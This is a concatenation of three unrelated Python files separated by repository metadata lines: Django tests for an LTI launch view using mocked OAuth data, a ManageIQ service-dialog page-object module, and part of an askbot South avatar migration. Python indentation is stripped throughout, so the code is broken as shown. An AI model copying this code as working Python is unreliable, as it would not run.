from chat.fsm_plugin.chat import get_specs
from chat.fsm_plugin.additional import get_specs as get_specs_additional
self.client = Client()
self.user = User.objects.create_user('test', '[email protected]', 'test')
get_specs()[0].save_graph(self.user.username)
get_specs_additional()[0].save_graph(self.user.username)
mocked_nonce = u'135685044251684026041377608307'
mocked_timestamp = u'1234567890'
mocked_decoded_signature = u'my_signature='
self.headers = {
u'user_id': 1,
u'lis_person_name_full': u'Test Username',
u'lis_person_name_given': u'First',
u'lis_person_name_family': u'Second',
u'lis_person_contact_email_primary': u'[email protected]',
u'lis_person_sourcedid': u'Test_Username',
u'oauth_callback': u'about:blank',
u'launch_presentation_return_url': '',
u'lti_message_type': u'basic-lti-launch-request',
u'lti_version': 'LTI-1p0',
u'roles': u'Student',
u'context_id': 1,
u'tool_consumer_info_product_family_code': u'moodle',
u'context_title': u'Test title',
u'tool_consumer_instance_guid': u'test.dot.com',
u'resource_link_id': 'dfgsfhrybvrth',
u'lis_result_sourcedid': 'wesgaegagrreg',
u'oauth_nonce': mocked_nonce,
u'oauth_timestamp': mocked_timestamp,
u'oauth_consumer_key': u'consumer_key',
u'oauth_signature_method': u'HMAC-SHA1',
u'oauth_version': u'1.0',
u'oauth_signature': mocked_decoded_signature
}
self.unit = Unit(title='Test title', addedBy=self.user)
self.unit.save()
self.course = Course(title='Test title',
description='test description',
access='Public',
enrollCode='111',
lockout='222',
addedBy=self.user)
self.course.save()
self.course_ref = CourseRef(
course=self.course, context_id=self.headers.get('context_id'),
tc_guid=self.headers.get('tool_consumer_instance_guid')
)
self.course_ref.save()
self.course_ref.instructors.add(self.user)
self.role1 = Role(
role=Role.ENROLLED,
user=self.user,
course=self.course,
)
self.role1.save()
self.courseunit = CourseUnit(
unit=self.unit, course=self.course,
order=0, addedBy=self.user, releaseTime=timezone.now()
)
self.courseunit.save()
lesson = Lesson(title='title', text='text', addedBy=self.user)
lesson.save()
unitlesson = UnitLesson(
unit=self.unit, order=0, lesson=lesson, addedBy=self.user, treeID=lesson.id
)
unitlesson.save()
self.lti_consumer = LtiConsumer(
consumer_name='test',
consumer_key='consumer_key',
consumer_secret='test_key'
)
self.lti_consumer.save()
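# --- Illustrative sketch (not part of the original tests) ---
# The tests below mock the OAuth signature check; a real LTI consumer would
# sign the launch with python-oauth2 roughly like this (a hedged sketch --
# `launch_url` is hypothetical):
#
#     consumer = oauth2.Consumer(u'consumer_key', u'test_key')
#     req = oauth2.Request(method='POST', url=launch_url, parameters=headers)
#     req.sign_request(oauth2.SignatureMethod_HMAC_SHA1(), consumer, None)
#     signed_headers = dict(req)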
@patch('lti.views.DjangoToolProvider')
class MethodsTest(LTITestCase):
"""
    Tests that the view responds correctly to each HTTP request method.
"""
@patch('lti.views.waffle.switch_is_active', return_value=False)
def test_post(self, switch, mocked):
mocked.return_value.is_valid_request.return_value = True
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertTemplateUsed(response, template_name='ct/course.html')
switch.return_value = True
response = self.client.post(
'/lti/',
data=self.headers,
follow=True
)
self.assertTemplateUsed(response, template_name='lms/course_page.html')
def test_failure_post(self, mocked):
mocked.return_value.is_valid_request.return_value = False
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertTemplateUsed(response, template_name='lti/error.html')
def test_get(self, mocked):
mocked.return_value.is_valid_request.return_value = True
response = self.client.get('/lti/', follow=True)
self.assertTemplateUsed(response, template_name='lti/error.html')
@ddt
@patch('lti.views.DjangoToolProvider')
class ParamsTest(LTITestCase):
"""
    Tests handling of various LTI launch parameters.
"""
@unpack
@data((Role.INSTRUCTOR, {u'roles': u'Instructor'}),
(Role.ENROLLED, {u'roles': u'Learner'}))
def test_roles(self, role, header, mocked):
self.headers.update(header)
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/',
data=self.headers,
follow=True)
self.assertTrue(Role.objects.filter(role=role).exists())
def test_user_id(self, mocked):
del self.headers[u'user_id']
mocked.return_value.is_valid_request.return_value = True
response = self.client.post('/lti/',
data=self.headers,
follow=True)
self.assertTemplateUsed(response, template_name='lti/error.html')
def test_roles_none(self, mocked):
del self.headers[u'roles']
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/', data=self.headers, follow=True)
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
def test_lti_user(self, mocked):
"""
Default LTI user creation process.
"""
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/', data=self.headers, follow=True)
self.assertTrue(LTIUser.objects.filter(lti_consumer=self.lti_consumer).exists())
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
self.assertEqual(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user,
self.user)
def test_lti_users_same_full_name(self, mocked):
"""
Test user creation w/ the same `lis_person_name_full`.
"""
mocked.return_value.is_valid_request.return_value = True
# Link LtiUser to Django user by email
self.client.post('/lti/', data=self.headers, follow=True)
self.assertEqual(
self.user, LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user
)
# Create new Django user
self.headers[u'user_id'] = 2
self.headers[u'lis_person_contact_email_primary'] = '[email protected]'
self.client.post('/lti/', data=self.headers, follow=True)
self.assertNotEqual(self.user, UserSocialAuth.objects.get(
uid=self.headers[u'lis_person_contact_email_primary']
).user)
first_user = UserSocialAuth.objects.get(
uid=self.headers[u'lis_person_contact_email_primary']
).user
# Create another Django user
self.headers[u'user_id'] = 3
self.headers[u'lis_person_contact_email_primary'] = '[email protected]'
self.client.post('/lti/', data=self.headers, follow=True)
self.assertNotEqual(first_user, UserSocialAuth.objects.get(
uid=self.headers[u'lis_person_contact_email_primary']
).user)
@patch('lti.models.hash_lti_user_data')
def test_lti_user_unicode_username(self, hash_lti_user_data, mocked):
"""
Test unicode full name from LTI.
"""
mocked.return_value.is_valid_request.return_value = True
hashvalue = 'somehashvalue'
hash_lti_user_data.return_value = hashvalue
self.headers[u'user_id'] = 2
self.headers[u'lis_person_contact_email_primary'] = '[email protected]'
        self.headers[u'lis_person_name_full'] = u'テスト'  # non-ASCII full name
self.client.post('/lti/', data=self.headers, follow=True)
new_user = UserSocialAuth.objects.get(
uid=self.headers[u'lis_person_contact_email_primary']
).user
self.assertNotEqual(self.user, new_user)
self.assertEqual(new_user.username, hashvalue)
def test_lti_user_no_email(self, mocked):
del self.headers[u'lis_person_contact_email_primary']
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/',
data=self.headers,
follow=True)
self.assertTrue(LTIUser.objects.filter(lti_consumer=self.lti_consumer).exists())
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
self.assertNotEqual(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user,
User.objects.get(id=self.user.id))
@patch('lti.models.hash_lti_user_data')
def test_lti_user_no_username_no_email(self, hash_lti_user_data, mocked):
"""Test for non-existent username field
If there is no username in POST
we create user with random username.
"""
test_random_username = 'c'*32
del self.headers[u'lis_person_name_full']
del self.headers[u'lis_person_contact_email_primary']
mocked.return_value.is_valid_request.return_value = True
hash_lti_user_data.return_value = test_random_username[:30]
self.client.post('/lti/', data=self.headers, follow=True)
self.assertTrue(LTIUser.objects.filter(lti_consumer=self.lti_consumer).exists())
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
self.assertNotEqual(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user,
User.objects.get(id=self.user.id))
self.assertEqual(
LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user.username,
test_random_username[:30]
)
self.assertEqual(
len(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user.username),
30
)
def test_lti_user_link_social(self, mocked):
"""
        Link the LTI user to an existing Django user via the social auth (email) record.
"""
social = UserSocialAuth(
user=self.user,
uid=self.headers[u'lis_person_contact_email_primary'],
provider='email'
)
social.save()
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/',
data=self.headers,
follow=True)
self.assertTrue(LTIUser.objects.filter(lti_consumer=self.lti_consumer).exists())
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
self.assertEqual(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user,
social.user)
def test_lti_user_timezone_positive(self, mocked):
self.user.profile.delete()
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/', data=self.headers, follow=True, REMOTE_ADDR='194.242.96.17')
# update user, get it again with newly created profile
user = User.objects.get(id=self.user.id)
# profile should be created
self.assertIsNotNone(user.profile)
profile = Profile.objects.get(user=user)
self.assertEqual(profile.id, user.profile.id)
self.assertIsNotNone(profile.timezone)
# IP 194.242.96.17 should be associated with Europe/Zaporozhye TZ
self.assertEqual(profile.timezone, 'Europe/Zaporozhye')
def test_lti_user_timezone_default_value(self, mocked):
self.user.profile.delete()
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/', data=self.headers, follow=True, REMOTE_ADDR='172.16.0.1')
# update user, get it again with newly created profile
user = User.objects.get(id=self.user.id)
# profile should be created
self.assertIsNotNone(user.profile)
profile = Profile.objects.get(user=user)
self.assertEqual(profile.id, user.profile.id)
self.assertIsNotNone(profile.timezone)
        # 172.16.0.1 is a private IP, so the default settings.TIME_ZONE is used
from django.conf import settings
self.assertEqual(profile.timezone, settings.TIME_ZONE)
@ddt
@patch('lti.views.DjangoToolProvider')
class ExceptionTest(LTITestCase):
"""
    Tests that exceptions raised during request validation render the error page.
"""
@data(oauth2.MissingSignature, oauth2.Error, KeyError, AttributeError)
def test_exceptions(self, exception, mocked):
mocked.return_value.is_valid_request.side_effect = exception()
response = self.client.get('/lti/', follow=True)
self.assertTemplateUsed(response, template_name='lti/error.html')
class ModelTest(LTITestCase):
"""
Test model LTIUser.
"""
def test_lti_user_not_enrolled(self):
"""Test that user not enrolled yet"""
lti_user = LTIUser(user_id=self.user.id,
lti_consumer=self.lti_consumer,
extra_data=json.dumps(self.headers),
django_user=self.user)
lti_user.save()
self.role1.delete()
self.assertFalse(lti_user.is_enrolled('student', self.course.id))
def test_lti_user(self):
"""Test enrollment process"""
lti_user = LTIUser(user_id=self.user.id,
lti_consumer=self.lti_consumer,
extra_data=json.dumps(self.headers),
django_user=self.user)
lti_user.save()
lti_user.enroll('student', self.course.id)
self.assertTrue(lti_user.is_enrolled('student', self.course.id))
def test_lti_user_create_links(self):
"""Creating LTIUser without Django user
Testing Django user creation process.
"""
lti_user = LTIUser(user_id=self.user.id,
lti_consumer=self.lti_consumer,
extra_data=json.dumps(self.headers))
lti_user.save()
self.assertFalse(lti_user.is_linked)
lti_user.create_links()
self.assertTrue(lti_user.is_linked)
@ddt
@patch('lti.views.DjangoToolProvider')
class TestCourseRef(LTITestCase):
"""
Testing CourseRef object.
"""
def test_course_ref_roles(self, mocked):
"""Test different action for different roles"""
mocked.return_value.is_valid_request.return_value = True
self.course_ref.delete()
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertFalse(CourseRef.objects.filter(course=self.course).exists())
self.assertTemplateUsed(response, 'lti/error.html')
def test_create_courseref_only_lti(self, mocked):
"""
Test that only LTI is allowed.
"""
request = Mock()
request.session = {}
res = create_courseref(request)
self.assertEqual(res.content, 'Only LTI allowed')
@unpack
@data(('1', 'ct:course'), ('1111', 'ct:edit_course'))
    def test_create_courseref_existence(self, context_id, landing_page, mocked):
"""
Test for existence/non-existence of CourseRef.
"""
_id = self.course.id if context_id == '1' else self.course.id + 1
lti_post = {'context_id': context_id,
'context_title': 'test title',
'tool_consumer_instance_guid': 'test.dot.com',
'roles': 'Instructor'}
request = Mock()
request.user = self.user
request.session = {'LTI_POST': lti_post,
'is_valid': True}
res = create_courseref(request)
        self.assertEqual(res.url, reverse(landing_page, args=(_id,)))
@patch('lti.views.waffle.switch_is_active', return_value=False)
@patch('lti.views.DjangoToolProvider')
class TestUnit(LTITestCase):
"""
Testing Unit template rendering.
"""
def test_unit_render(self, mocked, switch):
mocked.return_value.is_valid_request.return_value = True
response = self.client.post(
'/lti/unit/{}/'.format(self.unit.id), data=self.headers, follow=True
)
self.assertTemplateUsed(response, 'ct/study_unit.html')
switch.return_value = True
response = self.client.post(
'/lti/unit/{}/'.format(self.unit.id), data=self.headers, follow=True
)
self.assertTemplateUsed(response, 'chat/main_view.html')
def test_instructor_enabled_404_wo_instructor_profile(self, mocked, switch):
"""
Checks redirect to the new Instructor UI but fail on became instructor.
"""
mocked.return_value.is_valid_request.return_value = True
switch.return_value = True
headers = self.headers.copy()
headers['roles'] = 'Instructor'
response = self.client.post(
'/lti/unit/{}/'.format(self.unit.id), data=headers, follow=True
)
_next = reverse('ctms:courslet_view', args=(self.course.id, self.unit.id))
self.assertRedirects(response, '{}?next={}'.format(reverse('accounts:profile_update'), _next))
def test_instructor_enabled_w_instructor_profile_unit_view(self, mocked, switch):
"""
Checks redirect to the new Instructor UI on courselet detail page.
"""
mocked.return_value.is_valid_request.return_value = True
switch.return_value = True
headers = self.headers.copy()
headers['roles'] = 'Instructor'
Instructor.objects.create(user=self.user, institution='institute',
what_do_you_teach='something')
response = self.client.post(
'/lti/unit/{}/'.format(self.unit.id), data=headers, follow=True
)
assert response.status_code == 200
self.assertTemplateUsed(response, 'ctms/courselet_detail.html')
def test_instructor_enabled_w_instructor_profile_course_view(self, mocked, switch):
"""
Checks redirect to the new Instructor UI on course detail page.
"""
mocked.return_value.is_valid_request.return_value = True
switch.return_value = True
headers = self.headers.copy()
headers['roles'] = 'Instructor'
Instructor.objects.create(user=self.user, institution='institute',
what_do_you_teach='something')
response = self.client.post('/lti/', data=headers, follow=True)
assert response.status_code == 200
self.assertTemplateUsed(response, 'ctms/course_detail.html')
class AcceptanceTests(LTITestCase):
"""
Acceptance test to check different flows of handling LTI requests.
"""
def test_expired_consumer(self):
"""
Checking that expired consumer will not be used.
"""
self.lti_consumer.expiration_date = date.today() - timedelta(days=1)
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertTemplateUsed(response, 'lti/error.html')
@patch('lti.views.LtiConsumer.objects.filter')
def test_short_term_consumer(self, mocked_consumer):
"""
Test that user w/ short_term flag will be treated correctly.
"""
self.lti_consumer.expiration_date = date.today() + timedelta(days=1)
self.headers['custom_short_term'] = 'true'
response = self.client.post('/lti/', data=self.headers, follow=True)
mocked_consumer.assert_called_once_with(
consumer_key=self.headers['oauth_consumer_key']
)
@patch('lti.views.LtiConsumer.get_or_combine')
def test_typical_consumer(self, mocked_consumer):
"""
        Typical LTI requests (w/o short_term flag) are resolved via get_or_combine.
"""
self.lti_consumer.expiration_date = date.today() + timedelta(days=1)
response = self.client.post('/lti/', data=self.headers, follow=True)
mocked_consumer.assert_called_once_with(
self.headers['tool_consumer_instance_guid'],
self.headers['oauth_consumer_key'],
)
def test_no_consumer_found(self):
"""
        If no LtiConsumer is found, the error page is rendered.
"""
self.lti_consumer.delete()
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertTemplateUsed(response, 'lti/error.html')
| apache-2.0 |
lkhomenk/integration_tests | cfme/automate/dialogs/service_dialogs.py | 6 | 4707 | import attr
from cached_property import cached_property
from navmazing import NavigateToAttribute, NavigateToSibling
from widgetastic.utils import Fillable
from widgetastic.widget import Text
from widgetastic_patternfly import CandidateNotFound
from cfme.exceptions import ItemNotFound
from cfme.modeling.base import BaseCollection, BaseEntity
from cfme.utils.appliance.implementations.ui import navigator, CFMENavigateStep, navigate_to
from widgetastic_manageiq import PaginationPane, Table
from . import AutomateCustomizationView, AddDialogView, EditDialogView
from .dialog_tab import TabCollection
class DialogsView(AutomateCustomizationView):
title = Text("#explorer_title_text")
paginator = PaginationPane()
table = Table(".//div[@id='list_grid' or @class='miq-data-table']/table")
@property
def is_displayed(self):
return (
self.in_customization and
self.title.text == 'All Dialogs' and
self.service_dialogs.is_opened and
self.service_dialogs.tree.currently_selected == ["All Dialogs"])
class DetailsDialogView(AutomateCustomizationView):
title = Text("#explorer_title_text")
@property
def is_displayed(self):
return (
self.in_customization and self.service_dialogs.is_opened and
self.title.text == 'Dialog "{}"'.format(self.context['object'].label)
)
@attr.s
class Dialog(BaseEntity, Fillable):
"""A class representing one Dialog in the UI."""
label = attr.ib()
description = attr.ib(default=None)
_collections = {'tabs': TabCollection}
def as_fill_value(self):
return self.label
@property
def dialog(self):
return self
@cached_property
def tabs(self):
return self.collections.tabs
@property
def tree_path(self):
return self.parent.tree_path + [self.label]
def update(self, updates):
""" Update dialog method"""
view = navigate_to(self, 'Edit')
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
view = self.create_view(DetailsDialogView, override=updates)
assert view.is_displayed
view.flash.assert_no_error()
if changed:
view.flash.assert_message(
'{} was saved'.format(updates.get('name', self.label)))
else:
view.flash.assert_message(
'Dialog editing was canceled by the user.')
def delete(self):
""" Delete dialog method"""
view = navigate_to(self, "Details")
view.configuration.item_select('Remove Dialog', handle_alert=True)
view = self.create_view(DialogsView)
assert view.is_displayed
view.flash.assert_no_error()
view.flash.assert_success_message(
'Dialog "{}": Delete successful'.format(self.label))
@property
def exists(self):
""" Returns True if dialog exists"""
try:
navigate_to(self, 'Details')
return True
except (CandidateNotFound, ItemNotFound):
return False
def delete_if_exists(self):
if self.exists:
self.delete()
@attr.s
class DialogCollection(BaseCollection):
"""Collection object for the :py:class:`Dialog`."""
tree_path = ['All Dialogs']
ENTITY = Dialog
def create(self, label=None, description=None):
""" Create dialog label method """
view = navigate_to(self, 'Add')
view.fill({'label': label, 'description': description})
return self.instantiate(
label=label, description=description)
@navigator.register(DialogCollection)
class All(CFMENavigateStep):
VIEW = DialogsView
prerequisite = NavigateToAttribute('appliance.server', 'AutomateCustomization')
def step(self):
self.view.service_dialogs.tree.click_path(*self.obj.tree_path)
@navigator.register(DialogCollection)
class Add(CFMENavigateStep):
VIEW = AddDialogView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.configuration.item_select('Add a new Dialog')
@navigator.register(Dialog)
class Details(CFMENavigateStep):
VIEW = DetailsDialogView
prerequisite = NavigateToAttribute('appliance.server', 'AutomateCustomization')
def step(self):
self.prerequisite_view.service_dialogs.tree.click_path(*self.obj.tree_path)
@navigator.register(Dialog)
class Edit(CFMENavigateStep):
VIEW = EditDialogView
prerequisite = NavigateToSibling('Details')
def step(self):
self.prerequisite_view.configuration.item_select("Edit this Dialog")
| gpl-2.0 |
samhoo/askbot-realworld | askbot/migrations/0044_migrate_has_custom_avatar_field.py | 20 | 27460 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from askbot.utils.console import print_action
from unidecode import unidecode
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
print 'Migrating users to new avatar field'
for user in orm['auth.user'].objects.all():
print_action('migrating user: %s' % unidecode(user.username))
if user.has_custom_avatar == True:
user.avatar_type = 'a'
else:
user.avatar_type = 'n'
user.save()
print_action(
'user %s migrated avatar_type: %s' % \
(unidecode(user.username), user.avatar_type)
)
def backwards(self, orm):
"Write your backwards methods here."
pass
models = {
'askbot.activity': {
'Meta': {'object_name': 'Activity', 'db_table': "u'activity'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'activity_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_auditted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']", 'null': 'True'}),
'receiving_users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'received_activity'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'recipients': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'incoming_activity'", 'symmetrical': 'False', 'through': "orm['askbot.ActivityAuditStatus']", 'to': "orm['auth.User']"}),
'summary': ('django.db.models.fields.TextField', [], {'default': "''"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.activityauditstatus': {
'Meta': {'unique_together': "(('user', 'activity'),)", 'object_name': 'ActivityAuditStatus'},
'activity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Activity']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.anonymousanswer': {
'Meta': {'object_name': 'AnonymousAnswer'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_addr': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'anonymous_answers'", 'to': "orm['askbot.Question']"}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'text': ('django.db.models.fields.TextField', [], {}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'askbot.anonymousquestion': {
'Meta': {'object_name': 'AnonymousQuestion'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_addr': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'text': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'askbot.answer': {
'Meta': {'object_name': 'Answer', 'db_table': "u'answer'"},
'accepted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'accepted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['auth.User']"}),
'comment_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'html': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_edited_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'last_edited_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'locked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'locked_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'locked_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locked_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'offensive_flag_count': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['askbot.Question']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'text': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'vote_down_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'vote_up_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wikified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'askbot.answerrevision': {
'Meta': {'ordering': "('-revision',)", 'object_name': 'AnswerRevision', 'db_table': "u'answer_revision'"},
'answer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['askbot.Answer']"}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answerrevisions'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'revised_at': ('django.db.models.fields.DateTimeField', [], {}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'text': ('django.db.models.fields.TextField', [], {})
},
'askbot.award': {
'Meta': {'object_name': 'Award', 'db_table': "u'award'"},
'awarded_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'badge': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'award_badge'", 'to': "orm['askbot.BadgeData']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'award_user'", 'to': "orm['auth.User']"})
},
'askbot.badgedata': {
'Meta': {'ordering': "('slug',)", 'object_name': 'BadgeData'},
'awarded_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'awarded_to': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'badges'", 'symmetrical': 'False', 'through': "orm['askbot.Award']", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'askbot.comment': {
'Meta': {'ordering': "('-added_at',)", 'object_name': 'Comment', 'db_table': "u'comment'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'html': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2048'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'offensive_flag_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comments'", 'to': "orm['auth.User']"})
},
'askbot.emailfeedsetting': {
'Meta': {'object_name': 'EmailFeedSetting'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'feed_type': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'frequency': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reported_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'subscriber': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notification_subscriptions'", 'to': "orm['auth.User']"})
},
'askbot.favoritequestion': {
'Meta': {'object_name': 'FavoriteQuestion', 'db_table': "u'favorite_question'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_favorite_questions'", 'to': "orm['auth.User']"})
},
'askbot.markedtag': {
'Meta': {'object_name': 'MarkedTag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_selections'", 'to': "orm['askbot.Tag']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tag_selections'", 'to': "orm['auth.User']"})
},
'askbot.question': {
'Meta': {'object_name': 'Question', 'db_table': "u'question'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'answer_accepted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'answer_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'questions'", 'to': "orm['auth.User']"}),
'close_reason': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'closed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'closed_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'closed_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'comment_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
